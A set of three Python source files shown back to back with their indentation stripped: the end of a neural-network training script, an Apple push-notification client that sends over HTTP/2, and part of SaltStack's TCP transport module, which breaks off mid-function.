print('outputs file created')
else:
print(os.listdir('./outputs'))
error_count = 0
for iteration in tqdm(range(start_iter + 1, max_iteration + 1)):
try:
training = pinned_training_queue.get(block=True)
except:
print('Error when extracting data')
error_count += 1
if error_count > 10:
print('failed')
time.sleep(1)
break
continue
training_loss = nnet.train(**training)
if display and iteration % display == 0:
print("training loss at iteration {}: {}".format(iteration, training_loss.item()))
run.log('train_loss', training_loss.item())
val_iter = 5
if val_iter and validation_db.db_inds.size and iteration % val_iter == 0:
nnet.eval_mode()
validation, val_ind = sample_data(validation_db, val_ind, data_aug=False)
validation_loss = nnet.validate(**validation)
print("validation loss at iteration {}: {}".format(iteration, validation_loss.item()))
run.log('val_loss', validation_loss.item())
nnet.train_mode()
if iteration % snapshot == 0:
nnet.save_params(iteration)
if iteration % stepsize == 0:
learning_rate /= decay_rate
nnet.set_lr(learning_rate)
# sending signal to kill the thread
training_pin_semaphore.release()
# terminating data fetching processes
for training_task in training_tasks:
training_task.terminate()
if __name__ == "__main__":
args = parse_args()
cfg_file = os.path.join(system_configs.config_dir, args.cfg_file + ".json")
with open(cfg_file, "r") as f:
configs = json.load(f)
configs["system"]["data_dir"] = args.data_dir
configs["system"]["cache_dir"] = args.cache_path
file_list_data = os.listdir(args.data_dir)
print(file_list_data)
configs["system"]["snapshot_name"] = args.cfg_file
system_configs.update_config(configs["system"])
train_split = system_configs.train_split
val_split = system_configs.val_split
print("loading all datasets...")
dataset = system_configs.dataset
# threads = max(torch.cuda.device_count() * 2, 4)
threads = args.threads
print("using {} threads".format(threads))
training_dbs = [datasets[dataset](configs["db"], train_split) for _ in range(threads)]
validation_db = datasets[dataset](configs["db"], val_split)
print("system config...")
pprint.pprint(system_configs.full)
print("db config...")
pprint.pprint(training_dbs[0].configs)
print("len of db: {}".format(len(training_dbs[0].db_inds)))
train(training_dbs, validation_db, args.start_iter)
|
client.py
|
import collections
import json
import logging
import time
import weakref
from enum import Enum
from json import JSONEncoder
from threading import Thread
from typing import Deque, Dict, Iterable, Optional, Tuple, Type, Union
from .credentials import CertificateCredentials, Credentials
from .errors import ConnectionFailed, exception_class_for_reason
# We don't generally need to know about the Credentials subclasses except to
# keep the old API, where APNsClient took a cert_file
from .payload import Payload
class NotificationPriority(Enum):
Immediate = '10'
Delayed = '5'
RequestStream = collections.namedtuple('RequestStream', ['stream_id', 'token'])
Notification = collections.namedtuple('Notification', ['token', 'payload'])
DEFAULT_APNS_PRIORITY = NotificationPriority.Immediate
CONCURRENT_STREAMS_SAFETY_MAXIMUM = 1000
MAX_CONNECTION_RETRIES = 3
logger = logging.getLogger(__name__)
class APNsClient(object):
SANDBOX_SERVER = 'api.sandbox.push.apple.com'
LIVE_SERVER = 'api.push.apple.com'
DEFAULT_PORT = 443
ALTERNATIVE_PORT = 2197
def __init__(self,
credentials: Union[Credentials, str],
use_sandbox: bool = False, use_alternative_port: bool = False, proto: Optional[str] = None,
json_encoder: Optional[Type[JSONEncoder]] = None, password: Optional[str] = None,
proxy_host: Optional[str] = None, proxy_port: Optional[int] = None,
heartbeat_period: Optional[float] = None) -> None:
if isinstance(credentials, str):
self.__credentials = CertificateCredentials(credentials, password) # type: Credentials
else:
self.__credentials = credentials
self._init_connection(use_sandbox, use_alternative_port, proto, proxy_host, proxy_port)
if heartbeat_period:
self._start_heartbeat(heartbeat_period)
self.__json_encoder = json_encoder
self.__max_concurrent_streams = 0
self.__previous_server_max_concurrent_streams = None
def _init_connection(self, use_sandbox: bool, use_alternative_port: bool, proto: Optional[str],
proxy_host: Optional[str], proxy_port: Optional[int]) -> None:
server = self.SANDBOX_SERVER if use_sandbox else self.LIVE_SERVER
port = self.ALTERNATIVE_PORT if use_alternative_port else self.DEFAULT_PORT
self._connection = self.__credentials.create_connection(server, port, proto, proxy_host, proxy_port)
def _start_heartbeat(self, heartbeat_period: float) -> None:
conn_ref = weakref.ref(self._connection)
def watchdog() -> None:
while True:
conn = conn_ref()
if conn is None:
break
conn.ping('-' * 8)
time.sleep(heartbeat_period)
thread = Thread(target=watchdog)
thread.setDaemon(True)
thread.start()
def send(self, token_hex: str, notification: Payload, topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.Immediate,
expiration: Optional[int] = None, collapse_id: Optional[str] = None) -> None:
stream_id = self.send_notification_async(token_hex, notification, topic, priority, expiration, collapse_id)
return stream_id
def send_notification(self, token_hex: str, notification: Payload, topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.Immediate,
expiration: Optional[int] = None, collapse_id: Optional[str] = None) -> None:
stream_id = self.send_notification_async(token_hex, notification, topic, priority, expiration, collapse_id)
result = self.get_notification_result(stream_id)
if result != 'Success':
if isinstance(result, tuple):
reason, info = result
raise exception_class_for_reason(reason)(info)
else:
raise exception_class_for_reason(result)
def send_notification_async(self, token_hex: str, notification: Payload, topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.Immediate,
expiration: Optional[int] = None, collapse_id: Optional[str] = None) -> int:
json_str = json.dumps(notification, cls=self.__json_encoder, ensure_ascii=False, separators=(',', ':'))
json_payload = json_str.encode('utf-8')
headers = {
'apns-push-type': 'alert'
}
if topic is not None:
headers['apns-topic'] = topic
if priority != DEFAULT_APNS_PRIORITY:
headers['apns-priority'] = priority.value
if expiration is not None:
headers['apns-expiration'] = '%d' % expiration
auth_header = self.__credentials.get_authorization_header(topic)
if auth_header is not None:
headers['authorization'] = auth_header
if collapse_id is not None:
headers['apns-collapse-id'] = collapse_id
url = '/3/device/{}'.format(token_hex)
stream_id = self._connection.request('POST', url, json_payload, headers) # type: int
return stream_id
def get_connection(self):
return self._connection
def get_notification_result(self, stream_id: int) -> Union[str, Tuple[str, str]]:
"""
Get result for specified stream
The function returns: 'Success' or 'failure reason' or ('Unregistered', timestamp)
"""
with self._connection.get_response(stream_id) as response:
if response.status == 200:
return 'Success'
else:
raw_data = response.read().decode('utf-8')
data = json.loads(raw_data) # type: Dict[str, str]
if response.status == 410:
return data['reason'], data['timestamp']
else:
return data['reason']
def send_notification_batch(self, notifications: Iterable[Notification], topic: Optional[str] = None,
priority: NotificationPriority = NotificationPriority.Immediate,
expiration: Optional[int] = None, collapse_id: Optional[str] = None
) -> Dict[str, Union[str, Tuple[str, str]]]:
"""
Send a notification to a list of tokens in batch. Instead of sending a synchronous request
for each token, send multiple requests concurrently. This is done on the same connection,
using HTTP/2 streams (one request per stream).
APNs allows many streams simultaneously, but the number of streams can vary depending on
server load. This method reads the SETTINGS frame sent by the server to figure out the
maximum number of concurrent streams. Typically, APNs reports a maximum of 500.
The function returns a dictionary mapping each token to its result. The result is "Success"
if the token was sent successfully, or the string returned by APNs in the 'reason' field of
the response, if the token generated an error.
"""
notification_iterator = iter(notifications)
next_notification = next(notification_iterator, None)
# Make sure we're connected to APNs, so that we receive and process the server's SETTINGS
# frame before starting to send notifications.
self.connect()
results = {}
open_streams = collections.deque() # type: Deque[RequestStream]
# Loop on the tokens, sending as many requests as possible concurrently to APNs.
# When reaching the maximum concurrent streams limit, wait for a response before sending
# another request.
while len(open_streams) > 0 or next_notification is not None:
# Update the max_concurrent_streams on every iteration since a SETTINGS frame can be
# sent by the server at any time.
self.update_max_concurrent_streams()
if next_notification is not None and len(open_streams) < self.__max_concurrent_streams:
logger.info('Sending to token %s', next_notification.token)
stream_id = self.send_notification_async(next_notification.token, next_notification.payload, topic,
priority, expiration, collapse_id)
open_streams.append(RequestStream(stream_id, next_notification.token))
next_notification = next(notification_iterator, None)
if next_notification is None:
# No tokens remaining. Proceed to get results for pending requests.
logger.info('Finished sending all tokens, waiting for pending requests.')
else:
# We have at least one request waiting for response (otherwise we would have either
# sent new requests or exited the while loop.) Wait for the first outstanding stream
# to return a response.
pending_stream = open_streams.popleft()
result = self.get_notification_result(pending_stream.stream_id)
logger.info('Got response for %s: %s', pending_stream.token, result)
results[pending_stream.token] = result
return results
def update_max_concurrent_streams(self) -> None:
# Get the max_concurrent_streams setting returned by the server.
# The max_concurrent_streams value is saved in the H2Connection instance that must be
# accessed using a with statement in order to acquire a lock.
# pylint: disable=protected-access
with self._connection._conn as connection:
max_concurrent_streams = connection.remote_settings.max_concurrent_streams
if max_concurrent_streams == self.__previous_server_max_concurrent_streams:
# The server hasn't issued an updated SETTINGS frame.
return
self.__previous_server_max_concurrent_streams = max_concurrent_streams
# Handle and log unexpected values sent by APNs, just in case.
if max_concurrent_streams > CONCURRENT_STREAMS_SAFETY_MAXIMUM:
logger.warning('APNs max_concurrent_streams too high (%s), resorting to default maximum (%s)',
max_concurrent_streams, CONCURRENT_STREAMS_SAFETY_MAXIMUM)
self.__max_concurrent_streams = CONCURRENT_STREAMS_SAFETY_MAXIMUM
elif max_concurrent_streams < 1:
logger.warning('APNs reported max_concurrent_streams less than 1 (%s), using value of 1',
max_concurrent_streams)
self.__max_concurrent_streams = 1
else:
logger.info('APNs set max_concurrent_streams to %s', max_concurrent_streams)
self.__max_concurrent_streams = max_concurrent_streams
def connect(self) -> None:
"""
Establish a connection to APNs. If already connected, the function does nothing. If the
connection fails, the function retries up to MAX_CONNECTION_RETRIES times.
"""
retries = 0
while retries < MAX_CONNECTION_RETRIES:
# noinspection PyBroadException
try:
self._connection.connect()
logger.info('Connected to APNs')
return
except Exception: # pylint: disable=broad-except
# close the connnection, otherwise next connect() call would do nothing
self._connection.close()
retries += 1
logger.exception('Failed connecting to APNs (attempt %s of %s)', retries, MAX_CONNECTION_RETRIES)
raise ConnectionFailed()
|
tcp.py
|
"""
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
"""
import errno
import logging
import os
import queue
import socket
import threading
import time
import traceback
import urllib.parse as urlparse
import weakref
import salt.crypt
import salt.exceptions
import salt.ext.tornado
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.iostream
import salt.ext.tornado.netutil
import salt.ext.tornado.tcpclient
import salt.ext.tornado.tcpserver
import salt.payload
import salt.transport.client
import salt.transport.frame
import salt.transport.ipc
import salt.transport.mixins.auth
import salt.transport.server
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.files
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.utils.versions
from salt.exceptions import SaltClientError, SaltReqTimeoutError
from salt.transport import iter_transport_opts
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import salt.ext.tornado.util
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
"""
Ensure that TCP keepalives are set for the socket.
"""
if hasattr(socket, "SO_KEEPALIVE"):
if opts.get("tcp_keepalive", False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, "SOL_TCP"):
if hasattr(socket, "TCP_KEEPIDLE"):
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE, int(tcp_keepalive_idle)
)
if hasattr(socket, "TCP_KEEPCNT"):
tcp_keepalive_cnt = opts.get("tcp_keepalive_cnt", -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT, int(tcp_keepalive_cnt)
)
if hasattr(socket, "TCP_KEEPINTVL"):
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP,
socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl),
)
if hasattr(socket, "SIO_KEEPALIVE_VALS"):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get("tcp_keepalive_idle", -1)
tcp_keepalive_intvl = opts.get("tcp_keepalive_intvl", -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(
socket.SIO_KEEPALIVE_VALS,
(
1,
int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000),
),
)
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingProcess):
"""
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
"""
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super().__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on
# Windows.
def __setstate__(self, state):
self.__init__(
state["opts"],
state["socket_queue"],
log_queue=state["log_queue"],
log_queue_level=state["log_queue_level"],
)
def __getstate__(self):
return {
"opts": self.opts,
"socket_queue": self.socket_queue,
"log_queue": self.log_queue,
"log_queue_level": self.log_queue_level,
}
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def run(self):
"""
Start the load balancer
"""
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except OSError as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if (
salt.ext.tornado.util.errno_from_exception(e)
== errno.ECONNABORTED
):
continue
raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
"""
Encapsulate sending routines to tcp.
Note: this class returns a singleton
"""
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
async_methods = [
"crypted_transfer_decode_dictentry",
"_crypted_transfer",
"_uncrypted_transfer",
"send",
]
close_methods = [
"close",
]
def __new__(cls, opts, **kwargs):
"""
Only create one instance of channel per __key()
"""
# do we have any mapping for this io_loop
io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug("Initializing new AsyncTCPReqChannel for %s", key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug("Re-using AsyncTCPReqChannel for %s", key)
return obj
@classmethod
def __key(cls, opts, **kwargs):
if "master_uri" in kwargs:
opts["master_uri"] = kwargs["master_uri"]
return (
opts["pki_dir"], # where the keys are stored
opts["id"], # minion ID
opts["master_uri"],
kwargs.get("crypt", "aes"), # TODO: use the same channel for crypt
)
@classmethod
def force_close_all_instances(cls):
"""
Will force close all instances
:return: None
"""
for weak_dict in list(cls.instance_map.values()):
for instance in list(weak_dict.values()):
instance.close()
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get("crypt", "aes")
self.io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
if self.crypt != "clear":
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get("resolver")
parse = urlparse.urlparse(self.opts["master_uri"])
master_host, master_port = parse.netloc.rsplit(":", 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, master_host, int(master_port),),
kwargs={
"io_loop": self.io_loop,
"resolver": resolver,
"source_ip": self.opts.get("source_ip"),
"source_port": self.opts.get("source_ret_port"),
},
)
def close(self):
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
"This is not the last %s instance. Not closing yet.",
self.__class__.__name__,
)
return
log.debug("Closing %s instance", self.__class__.__name__)
self._closing = True
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self.io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self.io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self.io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except OSError as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def crypted_transfer_decode_dictentry(
self, load, dictkey=None, tries=3, timeout=60
):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout
)
key = self.auth.get_keys()
if HAS_M2:
aes = key.private_decrypt(ret["key"], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret["key"])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
@salt.ext.tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
"""
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
"""
@salt.ext.tornado.gen.coroutine
def _do_transfer():
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
data = salt.transport.frame.decode_embedded_strs(data)
raise salt.ext.tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
"""
Send a request, return a future which will complete when we send the message
"""
try:
if self.crypt == "clear":
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except salt.ext.tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError("Connection to master lost")
raise salt.ext.tornado.gen.Return(ret)
class AsyncTCPPubChannel(
salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel
):
async_methods = [
"send_id",
"connect_callback",
"connect",
]
close_methods = [
"close",
]
def __init__(self, opts, **kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get("crypt", "aes")
self.io_loop = kwargs.get("io_loop") or salt.ext.tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.message_client = None
self.event = salt.utils.event.get_event("minion", opts=self.opts, listen=False)
def close(self):
if self._closing:
return
self._closing = True
if self.message_client is not None:
self.message_client.close()
self.message_client = None
if self.event is not None:
self.event.destroy()
self.event = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _package_load(self, load):
return {
"enc": self.crypt,
"load": load,
}
@salt.ext.tornado.gen.coroutine
def send_id(self, tok, force_auth):
"""
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
"""
load = {"id": self.opts["id"], "tok": tok}
@salt.ext.tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise salt.ext.tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while (
count <= self.opts["tcp_authentication_retries"]
or self.opts["tcp_authentication_retries"] < 0
):
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise salt.ext.tornado.gen.Return(ret)
@salt.ext.tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event({"master": self.opts["master"]}, "__master_connected")
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get("__role") == "syndic":
data = "Syndic {} started at {}".format(self.opts["id"], time.asctime())
tag = salt.utils.event.tagify([self.opts["id"], "start"], "syndic")
else:
data = "Minion {} started at {}".format(self.opts["id"], time.asctime())
tag = salt.utils.event.tagify([self.opts["id"], "start"], "minion")
load = {
"id": self.opts["id"],
"cmd": "_minion_event",
"pretag": None,
"tok": self.tok,
"data": data,
"tag": tag,
}
req_channel = salt.utils.asynchronous.SyncWrapper(
AsyncTCPReqChannel, (self.opts,), loop_kwarg="io_loop",
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info(
"fire_master failed: master could not be contacted. Request timed out."
)
except Exception: # pylint: disable=broad-except
log.info("fire_master failed: %s", traceback.format_exc())
finally:
# SyncWrapper will call either close() or destroy(), whichever is available
del req_channel
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event({"master": self.opts["master"]}, "__master_disconnected")
@salt.ext.tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b"salt")
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
# if this is changed from the default, we assume it was intentional
if int(self.opts.get("publish_port", 4505)) != 4505:
self.publish_port = self.opts.get("publish_port")
# else take the relayed publish_port master reports
else:
self.publish_port = self.auth.creds["publish_port"]
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts["master_ip"], int(self.publish_port)),
kwargs={
"io_loop": self.io_loop,
"connect_callback": self.connect_callback,
"disconnect_callback": self.disconnect_callback,
"source_ip": self.opts.get("source_ip"),
"source_port": self.opts.get("source_publish_port"),
},
)
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt: # pylint: disable=try-except-raise
raise
except Exception as exc: # pylint: disable=broad-except
if "-|RETRY|-" not in str(exc):
raise SaltClientError(
"Unable to sign_in to master: {}".format(exc)
) # TODO: better error message
def on_recv(self, callback):
"""
Register an on_recv callback
"""
if callback is None:
return self.message_client.on_recv(callback)
@salt.ext.tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = salt.utils.msgpack.loads(body)
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(
salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel
):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
self.req_server = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except OSError as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
raise
if self.req_server is None:
# We only close the socket if we don't have a req_server instance.
# If we did, because the req_server is also handling this socket, when we call
# req_server.stop(), tornado will give us an AssertionError because it's trying to
# match the socket.fileno() (after close it's -1) to the fd it holds on it's _sockets cache
# so it can remove the socket from the IOLoop handlers
self._socket.close()
self._socket = None
if self.req_server is not None:
try:
self.req_server.close()
except OSError as exc:
if exc.errno != 9:
raise
log.exception(
"TCPReqServerChannel close generated an exception: %s", str(exc)
)
self.req_server = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def pre_fork(self, process_manager):
"""
Pre-fork we need to create the zmq router device
"""
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
def post_fork(self, payload_handler, io_loop):
"""
After forking we need to create all of the local sockets to listen to the
router
payload_handler: function to call with your payloads
"""
if self.opts["pub_server_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting Publish daemon niceness to %i",
self.opts["pub_server_niceness"],
)
os.nice(self.opts["pub_server_niceness"])
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(
self.socket_queue,
self.handle_message,
ssl_options=self.opts.get("ssl"),
)
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind(
(self.opts["interface"], int(self.opts["ret_port"]))
)
self.req_server = SaltMessageServer(
self.handle_message,
ssl_options=self.opts.get("ssl"),
io_loop=self.io_loop,
)
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(
self, payload_handler, io_loop
)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, header, payload):
"""
Handle incoming messages from underlying tcp streams
"""
try:
try:
payload = self._decode_payload(payload)
except Exception: # pylint: disable=broad-except
stream.write(salt.transport.frame.frame_msg("bad load", header=header))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(
payload.get("load"), dict
):
yield stream.write(
salt.transport.frame.frame_msg(
"payload and load must be a dict", header=header
)
)
raise salt.ext.tornado.gen.Return()
try:
id_ = payload["load"].get("id", "")
if "\0" in id_:
log.error("Payload contains an id with a null byte: %s", payload)
stream.send(self.serial.dumps("bad load: id contains a null byte"))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error("Payload contains non-string id: %s", payload)
stream.send(
self.serial.dumps("bad load: id {} is not a string".format(id_))
)
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if (
payload["enc"] == "clear"
and payload.get("load", {}).get("cmd") == "_auth"
):
yield stream.write(
salt.transport.frame.frame_msg(
self._auth(payload["load"]), header=header
)
)
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.write("Some exception handling minion payload")
log.error(
"Some exception handling a payload from minion", exc_info=True
)
stream.close()
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get("fun", "send")
if req_fun == "send_clear":
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == "send":
stream.write(
salt.transport.frame.frame_msg(
self.crypticle.dumps(ret), header=header
)
)
elif req_fun == "send_private":
stream.write(
